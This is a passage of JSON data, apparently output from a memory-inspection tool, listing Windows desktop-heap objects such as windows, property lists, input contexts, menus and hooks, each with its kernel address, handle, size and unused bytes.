4,"UnusedBytes":16},{"Block":"0xffffc8d500608a70","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608aa0","Type":"WINDOW","Handle":"0x100ec","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608a50","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500608d00","Type":"WINDOW","Handle":"0x100ee","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006090a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500608eb0","Type":"WINDOW","Handle":"0x100f0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609070","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006090d0","Type":"WINDOW","Handle":"0x100f2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092d0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500609310","Type":"WINDOW","Handle":"0x100f4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607fa0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060e080","Type":"INPUTCONTEXT","Handle":"0x700f5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609490","Type":"WINDOW","Handle":"0x100f6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607950","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060d0a0","Type":"INPUTCONTEXT","Handle":"0x100f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500609610","Type":"WINDOW","Handle":"0x100f8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607b50","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006127d0","Type":"INPUTCONTEXT","Handle":"0xb00f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ac40","Type":"WINDOW","Handle":"0x200fa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ac0","Type":"INPUTCONTEXT","Handle":"0xa00fb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006271e0","Type":"WINDOW","Handle":"0x300fc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609e70","Type":"WINDOW","Handle":"0x100fe","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9c0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d50060cd20","Type":"INPUTCONTEXT","Handle":"0x400ff","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a0f0","Type":"WINDOW","Handle":"0x10100","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060abb0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060f700","Type":"INPUTCONTEXT","Handle":"0x20101","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a350","Type":"WINDOW","Handle":"0x10102","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060aa40","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500621180","Type":"MENU","Handle":"0x60103","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628430","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060a4d0","Type":"WINDOW","Handle":"0x10104","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a650","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50060eab0","Type":"INPUTCONTEXT","Handle":"0x20105","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060a850","Type":"WINDOW","Handle":"0x10106","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060a9d0","Type":"WINDOW:PROPLIST","Size":7,"UnusedBytes":24},{"Block":"0xffffc8d5006116b0","Type":"HOOK","Handle":"0x20107","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500616480","Type":"WINDOW","Handle":"0x20108","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060af20","Type":"WINDOW","Handle":"0x2010a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619880","Type":"INPUTCONTEXT","Handle":"0x1010b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b090","Type":"WINDOW","Handle":"0x1010c","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061a4c0","Type":"INPUTCONTEXT","Handle":"0x1010d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b2c0","Type":"WINDOW","Handle":"0x1010e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617030","Type":"INPUTCONTEXT","Handle":"0x1c010f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060b4f0","Type":"WINDOW","Handle":"0x10110","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500618a80","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50060b670","Type":"WINDOW","Handle":"0x10112","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b7f0","Type":"WINDOW","Handle":"0x10114","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060baa0","Type":"WINDOW","Handle":"0x10116","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060bc30","Type":"WINDOW","Handle":"0x10118","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c040","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061a510","Type":"INPUTCONTEXT","Handle":"0x10119","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060be90","Type":"WINDOW","Handle":"0x1011a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ba30","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50061aa00","Type":"INPUTCONTEXT","Handle":"0x1011b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c130","Type":"WINDOW","Handle":"0x1011c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060b9a0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061aa70","Type":"INPUTCONTEXT","Handle":"0x1011d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c360","Type":"WINDOW","Handle":"0x1011e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609050","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500624b30","Type":"WINDOW","Handle":"0x20120","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061ab00","Type":"INPUTCONTEXT","Handle":"0x10121","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c810","Type":"WINDOW","Handle":"0x10122","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50060c670","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061ab70","Type":"INPUTCONTEXT","Handle":"0x10123","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c9d0","Type":"WINDOW","Handle":"0x10124","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061abe0","Type":"INPUTCONTEXT","Handle":"0x10125","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cba0","Type":"WINDOW","Handle":"0x10126","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006039c0","Type":"MENU","Handle":"0x20127","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500621750","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060cdb0","Type":"WINDOW","Handle":"0x10128","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500604b70","Type":"INPUTCONTEXT","Handle":"0x20129","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060cf20","Type":"WINDOW","Handle":"0x1012a","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50061aef0","Type":"INPUTCONTEXT","Handle":"0x1012b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d0f0","Type":"WINDOW","Handle":"0x1012c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500610980","Type":"MENU","Handle":"0x3012d","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d5006273c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50060d2b0","Type":"WINDOW","Handle":"0x1012e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d450","Type":"WINDOW","Handle":"0x10130","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061c7d0","Type":"INPUTCONTEXT","Handle":"0x20131","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d700","Type":"WINDOW","Handle":"0x10132","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060d880","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d50061b380","Type":"INPUTCONTEXT","Handle":"0x10133","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060d9c0","Type":"WINDOW","Handle":"0x10134","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060db70","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060dbb0","Type":"WINDOW","Handle":"0x10136","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060dd30","Type":"WINDOW","Handle":"0x10138","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060deb0","Type":"WINDOW","Handle":"0x1013a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bf50","Type":"INPUTCONTEXT","Handle":"0x7013b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e180","Type":"WINDOW","Handle":"0x1013c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061b9c0","Type":"INPUTCONTEXT","Handle":"0x3013d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e3c0","Type":"WINDOW","Handle":"0x1013e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50060e6a0","Type":"WINDOW","Handle":"0x10140","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bcf0","Type":"INPUTCONTEXT","Handle":"0x10141","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060e900","Type":"WINDOW","Handle":"0x10142","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617ef0","Type":"INPUTCONTEXT","Handle":"0x10143","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060ec00","Type":"WINDOW","Handle":"0x10144","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060edf0","Type":"WINDOW","Handle":"0x10146","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006170d0","Type":"INPUTCONTEXT","Handle":"0x180147","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f0c0","Type":"WINDOW","Handle":"0x10148","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006028f0","Type":"INPUTCONTEXT","Handle":"0x80149","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060f4f0","Type":"WINDOW","Handle":"0x1014a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f750","Type":"WINDOW","Handle":"0x1014c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fa30","Type":"WINDOW","Handle":"0x1014e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fc00","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060c080","Type":"INPUTCONTEXT","Handle":"0x5014f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060fc60","Type":"WINDOW","Handle":"0x10150","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060fde0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fe40","Type":"WINDOW","Handle":"0x10152","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ffc0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061c8b0","Type":"HOOK","Handle":"0x10153","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500610020","Type":"WINDOW","Handle":"0x10154","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006101a0","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500610200","Type":"WINDOW","Handle":"0x10156","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610380","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50061ae80","Type":"INPUTCONTEXT","Handle":"0x30157","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006103e0","Type":"WINDOW","Handle":"0x10158","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610560","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d50060fbb0","Type":"INPUTCONTEXT","Handle":"0x50159","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006105c0","Type":"WINDOW","Handle":"0x1015a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610740","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d5006110f0","Type":"INPUTCONTEXT","Handle":"0x1015b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006107a0","Type":"WINDOW","Handle":"0x1015c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500610920","Type":"WINDOW:PROPLIST","Size":6,"UnusedBytes":8},{"Block":"0xffffc8d500611160","Type":"INPUTCONTEXT","Handle":"0x1015d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610a20","Type":"WINDOW","Handle":"0x1015e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121f0","Type":"INPUTCONTEXT","Handle":"0x2015f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610c90","Type":"WINDOW","Handle":"0x10160","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006121a0","Type":"INPUTCONTEXT","Handle":"0x90161","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500610f20","Type":"WINDOW","Handle":"0x10162","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006110c0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006111b0","Type":"WINDOW","Handle":"0x10164","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621be0","Type":"WINDOW","Handle":"0x30166","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612710","Type":"INPUTCONTEXT","Handle":"0x10167","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006114f0","Type":"WINDOW","Handle":"0x10168","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500612780","Type":"INPUTCONTEXT","Handle":"0x10169","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611820","Type":"WINDOW","Handle":"0x1016a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500620620","Type":"INPUTCONTEXT","Handle":"0xb016b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611a90","Type":"WINDOW","Handle":"0x1016c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500611c10","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500612860","Type":"INPUTCONTEXT","Handle":"0x1016d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50060c4e0","Type":"WINDOW","Handle":"0x2016e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006128d0","Type":"INPUTCONTEXT","Handle":"0x1016f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611e60","Type":"WINDOW","Handle":"0x10170","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500612000","Type":"WINDOW","Handle":"0x10172","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613210","Type":"INPUTCONTEXT","Handle":"0x10173","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612350","Type":"WINDOW","Handle":"0x10174","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613280","Type":"INPUTCONTEXT","Handle":"0x10175","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006124c0","Type":"WINDOW","Handle":"0x10176","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613ba0","Type":"INPUTCONTEXT","Handle":"0x10177","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500612bb0","Type":"WINDOW","Handle":"0x10178","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500612e00","Type":"WINDOW","Handle":"0x1017a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613080","Type":"WINDOW","Handle":"0x1017c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613cc0","Type":"INPUTCONTEXT","Handle":"0x1017d","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006133c0","Type":"WINDOW","Handle":"0x1017e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500614120","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d500613d10","Type":"HOOK","Handle":"0x2017f","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006135f0","Type":"WINDOW","Handle":"0x10180","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500613770","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500613ef0","Type":"INPUTCONTEXT","Handle":"0x10181","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621d90","Type":"WINDOW","Handle":"0x20182","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500613f40","Type":"INPUTCONTEXT","Handle":"0x10183","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006141e0","Type":"WINDOW","Handle":"0x20184","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500613dc0","Type":"INPUTCONTEXT","Handle":"0x10185","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614350","Type":"WINDOW","Handle":"0x10186","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614040","Type":"INPUTCONTEXT","Handle":"0x10187","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614510","Type":"WINDOW","Handle":"0x10188","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006140b0","Type":"INPUTCONTEXT","Handle":"0x10189","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614680","Type":"WINDOW","Handle":"0x1018a","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061bd40","Type":"WINDOW:PROPLIST","Size":14,"UnusedBytes":8},{"Block":"0xffffc8d500613fb0","Type":"INPUTCONTEXT","Handle":"0x1018b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006148b0","Type":"WINDOW","Handle":"0x1018c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500614a30","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614cc0","Type":"WINDOW","Handle":"0x1018e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006144c0","Type":"INPUTCONTEXT","Handle":"0x1018f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500614e80","Type":"WINDOW","Handle":"0x10190","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615150","Type":"WINDOW","Handle":"0x10192","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006153d0","Type":"WINDOW","Handle":"0x10194","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614b00","Type":"HOOK","Handle":"0x10195","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d500615900","Type":"WINDOW","Handle":"0x10196","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614a70","Type":"INPUTCONTEXT","Handle":"0x10197","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500615b50","Type":"WINDOW","Handle":"0x10198","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615dd0","Type":"WINDOW","Handle":"0x1019a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500614e30","Type":"INPUTCONTEXT","Handle":"0x1019b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061af40","Type":"WINDOW","Handle":"0x2019c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616820","Type":"WINDOW","Handle":"0x1019e","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d500617fc0","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500615010","Type":"INPUTCONTEXT","Handle":"0x1019f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500616a20","Type":"WINDOW","Handle":"0x101a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616ba0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500614b90","Type":"INPUTCONTEXT","Handle":"0x201a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617180","Type":"WINDOW","Handle":"0x201a2","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006173f0","Type":"WINDOW","Handle":"0x101a4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615540","Type":"INPUTCONTEXT","Handle":"0x101a5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617570","Type":"WINDOW","Handle":"0x101a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500615620","Type":"INPUTCONTEXT","Handle":"0x101a7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006176f0","Type":"WINDOW","Handle":"0x101a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006178b0","Type":"WINDOW","Handle":"0x101aa","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500615f60","Type":"INPUTCONTEXT","Handle":"0x101ab","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d500617bb0","Type":"WINDOW","Handle":"0x101ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500615fe0","Type":"INPUTCONTEXT","Handle":"0x101ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006181f0","Type":"WINDOW","Handle":"0x101ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500616050","Type":"INPUTCONTEXT","Handle":"0x101af","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618580","Type":"WINDOW","Handle":"0x101b0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b580","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d5006160c0","Type":"INPUTCONTEXT","Handle":"0x101b1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618800","Type":"WINDOW","Handle":"0x101b2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500618990","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500616130","Type":"INPUTCONTEXT","Handle":"0x101b3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618b40","Type":"WINDOW","Handle":"0x101b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500618cd0","Type":"WINDOW","Handle":"0x101b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616670","Type":"INPUTCONTEXT","Handle":"0x101b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618e50","Type":"WINDOW","Handle":"0x101b8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006166e0","Type":"INPUTCONTEXT","Handle":"0x101b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619020","Type":"WINDOW","Handle":"0x101ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616d80","Type":"INPUTCONTEXT","Handle":"0x101bb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619250","Type":"WINDOW","Handle":"0x101bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006193f0","Type":"WINDOW","Handle":"0x201be","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006196c0","Type":"WINDOW","Handle":"0x101c0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500619bc0","Type":"WINDOW:PROPLIST","Size":8,"UnusedBytes":8},{"Block":"0xffffc8d500616dd0","Type":"HOOK","Handle":"0x201c1","Size":7,"UnusedBytes":16},{"Block":"0xffffc8d5006199e0","Type":"WINDOW","Handle":"0x101c2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b540","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500616f40","Type":"INPUTCONTEXT","Handle":"0x101c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619c40","Type":"WINDOW","Handle":"0x101c4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500616fb0","Type":"INPUTCONTEXT","Handle":"0x101c5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500619eb0","Type":"WINDOW","Handle":"0x101c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a060","Type":"WINDOW","Handle":"0x101c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061a350","Type":"WINDOW","Handle":"0x101ca","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500619840","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500617310","Type":"INPUTCONTEXT","Handle":"0x101cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061a660","Type":"WINDOW","Handle":"0x101cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006173a0","Type":"INPUTCONTEXT","Handle":"0x101cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500611c30","Type":"WINDOW","Handle":"0x201ce","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500621220","Type":"MENU","Handle":"0x301cf","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d500628eb0","Type":"MENU:ITEMS","Size":145,"UnusedBytes":16},{"Block":"0xffffc8d50061aca0","Type":"WINDOW","Handle":"0x101d0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061a820","Type":"WINDOW","Handle":"0x201d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500616180","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061b1f0","Type":"WINDOW","Handle":"0x101d4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061b3d0","Type":"WINDOW","Handle":"0x101d6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620290","Type":"WINDOW","Handle":"0x301da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061bb00","Type":"WINDOW","Handle":"0x101dc","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061bfa0","Type":"WINDOW","Handle":"0x101de","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c110","Type":"WINDOW","Handle":"0x101e0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061c280","Type":"WINDOW","Handle":"0x101e2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500617a70","Type":"INPUTCONTEXT","Handle":"0x1a01e3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061c3f0","Type":"WINDOW","Handle":"0x101e4","Size":26,"UnusedBytes":16},{"Block":"0xffffc8d50061d190","Type":"WINDOW:PROPLIST","Size":12,"UnusedBytes":8},{"Block":"0xffffc8d50061c5e0","Type":"WINDOW","Handle":"0x101e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060c110","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500615370","Type":"INPUTCONTEXT","Handle":"0x101e7","Size":6,"UnusedBytes":32},{"Block":"0xffffc8d50061c9d0","Type":"WINDOW","Handle":"0x101e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617d50","Type":"INPUTCONTEXT","Handle":"0x101e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500621fd0","Type":"WINDOW","Handle":"0x301ea","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620ed0","Type":"INPUTCONTEXT","Handle":"0x1b01eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061c820","Type":"INPUTCONTEXT","Handle":"0x101ec","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500617e30","Type":"INPUTCONTEXT","Handle":"0x101ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cbf0","Type":"INPUTCONTEXT","Handle":"0x101ee","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006180b0","Type":"INPUTCONTEXT","Handle":"0x101ef","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cc40","Type":"WINDOW","Handle":"0x101f0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061cdf0","Type":"INPUTCONTEXT","Handle":"0x101f2","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ce40","Type":"WINDOW","Handle":"0x101f4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061d020","Type":"INPUTCONTEXT","Handle":"0x101f6","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500618440","Type":"INPUTCONTEXT","Handle":"0x101f7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061d090","Type":"INPUTCONTEXT","Handle":"0x101f8","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006189c0","Type":"INPUTCONTEXT","Handle":"0x101f9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061cb70","Type":"INPUTCONTEXT","Handle":"0x101